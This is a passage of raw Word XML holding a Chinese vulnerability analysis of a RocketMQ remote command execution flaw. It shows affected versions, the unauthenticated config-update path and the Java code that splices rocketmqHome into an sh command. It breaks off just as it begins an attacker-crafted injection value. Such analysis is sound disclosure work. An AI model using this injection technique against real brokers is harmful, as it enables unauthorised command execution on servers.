    <w:p w14:paraId="39ADE7ED" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache RocketMQ是一款分布式消息与流数据平台，由阿里开源并捐赠给Apache基金会，广泛应用于异步解耦、流量削峰与事件驱动架构。在RocketMQ 5.1.0及以前版本中，攻击者可通过NameServer向Broker发送更新配置的指令，修改rocketmqHome等关键配置项，并利用配置项在启动Filter Server时的命令拼接逻辑，实现远程命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA74E54" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074E78D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache RocketMQ &lt;= 5.1.0（Broker的updateBrokerConfig功能可被未授权访问时受影响）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3C971" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3B6E3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）配置更新入口：updateBrokerConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797BFD33" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>RocketMQ的Broker提供了一个通过NameServer更新配置的管理接口。DefaultMQAdminExt.updateBrokerConfig()方法会向指定Broker发送UPDATE_BROKER_CONFIG请求，Broker端的BrokerController收到请求后，会调用BrokerConfig类的update方法，将传入的Properties对象中的键值对合并到当前配置中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD8C75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DefaultMQAdminExt.updateBrokerConfig() 调用链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void updateBrokerConfig(String brokerAddr, Properties properties) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // 构造UPDATE_BROKER_CONFIG请求头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    UpdateBrokerConfigRequestHeader requestHeader = new UpdateBrokerConfigRequestHeader();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // 将properties序列化为JSON，作为请求体发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    this.mqClientInstance.getMQClientAPIImpl()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        .updateBrokerConfig(brokerAddr, requestHeader, properties, timeoutMillis);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F232F4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关键问题在于：该接口在默认配置下无需身份认证即可调用，且对可更新的配置项没有白名单限制。攻击者可以修改任意配置项，包括</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56999B4C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（2）命令注入触发点：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buildStartCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE79896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当Broker配置中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>filterServerNums</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大于0时，Broker会尝试启动Filter Server进程。启动命令由</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BrokerStartup.buildStartCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()方法构建，其核心代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D59480" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BrokerStartup.buildStartCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>() 关键代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">private String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buildStartCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    String config = "";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BrokerStartup.CONFIG_FILE_HELPER.getFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>() != null) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        config = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>String.format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("-c %s", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BrokerStartup.CONFIG_FILE_HELPER.getFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>this.brokerController.getBrokerConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getNamesrvAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>() != null) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        config += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>String.format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(" -n %s",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>this.brokerController.getBrokerConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getNamesrvAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NetworkUtil.isWindowsPlatform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>String.format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>("start /b %s\\bin\\mqfiltersrv.exe %s",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>this.brokerController.getBrokerConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getRocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(), config);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // Linux下通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行启动脚本，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接拼接到命令中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>String.format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh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%s/bin/startfsrv.sh %s",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>this.brokerController.getBrokerConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getRocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(), config);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AEBC74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可以看到，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置项的值被直接拼接到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令中，没有经过任何转义或校验。如果攻击者将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设置为包含恶意命令的字符串，当Filter Server启动时，恶意命令就会被Shell解析执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8092B2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（3）命令构造技巧：空格分割与参数注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588875D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由于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buildStartCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()最终通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行命令，Shell会按空格对参数进行分割。攻击者构造的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值需要</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>巧妙利用这一特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDC650" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>// 攻击者构造的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rocketmqHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>"-c $@|</w:t>
      </w:r>
